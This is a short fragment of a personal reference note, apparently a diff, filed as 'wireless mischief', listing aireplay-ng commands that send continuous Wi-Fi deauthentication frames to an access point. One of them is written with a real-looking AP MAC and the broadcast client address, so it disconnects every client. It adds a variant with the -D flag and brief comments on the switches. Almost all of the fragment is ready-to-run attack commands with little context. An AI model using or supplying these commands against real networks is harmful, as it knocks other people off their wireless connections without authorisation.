sjbavier/Reference/network/linux-network-wireless-mischief.md

 aireplay-ng -0 0 -a00:14:6C:7E:40:80 -c FF:FF:FF:FF:FF:FF wlan1
 aireplay-ng -0 0 -a <AP-MAC> -c <Client-MAC-or-FF:-for-all> <interface>
 # FF:FF:FF:FF:FF:FF is the broadcast address which affects all clients
+aireplay-ng -0 0 -a <AP-MAC> -c <Client-MAC-or-FF:-for-all> <interface> -D
+# -D stops the process from trying to determine the channel
 ```

 - -0: switch for deauthentication